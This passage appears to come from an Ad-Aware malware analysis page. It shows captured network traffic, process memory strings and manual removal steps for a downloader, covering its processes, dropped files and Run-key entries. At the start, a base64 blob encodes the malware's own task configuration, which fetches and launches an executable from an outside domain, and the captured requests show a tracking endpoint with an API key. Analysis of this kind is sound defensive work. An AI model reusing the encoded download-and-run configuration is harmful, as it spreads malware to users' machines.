o8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iT25lVHdvIiB2YWx1ZT0ibm90d2FpdCIg
cGFyYW1zPSI1N2E3NjRkMDQyYmY4Ii8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iSGFoYS
IgdmFsdWU9IjAwMDE3MDgyOCIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0K
DQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJIYWhhIiB2YWx1ZT0iMTcwODI4IiBtYXRjaD
0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC90YXNrPjx0YXNrPg0KDQo8cGVyZm9y
bT4NCg0KPGRvd25sb2FkIG5hbWU9IlNobzlsaWJpIiB2YWx1ZT0iaHR0cDovL2JyYXRpdG
xhbWlvLmNvbS9leGUvdXBkYXRlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5l
dD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IlNobzlsaWJpIiB2YW
x1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9IkRhdGUi
IHZhbHVlPSJmZThmMTcwODI4Ii8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQ
oNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkRhdGUiIHZhbHVlPSIxNzA4MjgiIG1h
<<< skipped >>>


POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 28 Aug 2017 10:22:17 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=bi4gjqakdo8u93hltarvh4vhk2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 28 Aug 2017 10:22:17 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=b9nctcdp6b5aqobqb1jc7qu9h0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..

The Application connects to the servers at the folowing location(s):

iexplore.exe_2188:

.text
`.data
.rsrc
@.reloc
Bv.TBv
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

iexplore.exe_3988:

.text
`.data
.rsrc
@.reloc
Bv.TBv
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

SearchProtocolHost.exe_3324:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_3308:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    SecondL.exe:2700
    Sho9libi.exe:1772
    OneTwo.exe:2916
    %original file name%.exe:1924

  2. Delete the original Application file.
  3. Delete or disinfect the following files created/modified by the Application:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe (204 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe.config (1 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
    %Program Files%\VIKAUDDVJG\uninstaller.exe.config (1 bytes)
    %Program Files%\VIKAUDDVJG\VIKAUDDVJ.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\SecondL.exe (208 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\OneTwo.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\SecondL.exe.config (1 bytes)
    C:\config.conf (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\Sho9libi.exe (227194 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\Sho9libi.exe.config (1 bytes)
    %Program Files%\VIKAUDDVJG\cast.config (37 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "drg0zk23g1j" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "OMEWPRODUCT_GN80Z" = "C:\%original file name%.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Y8LH5W7H9S9CA9N" = "%Program Files%\VIKAUDDVJG\VIKAUDDVJ.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Average: 2 (1 vote)


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now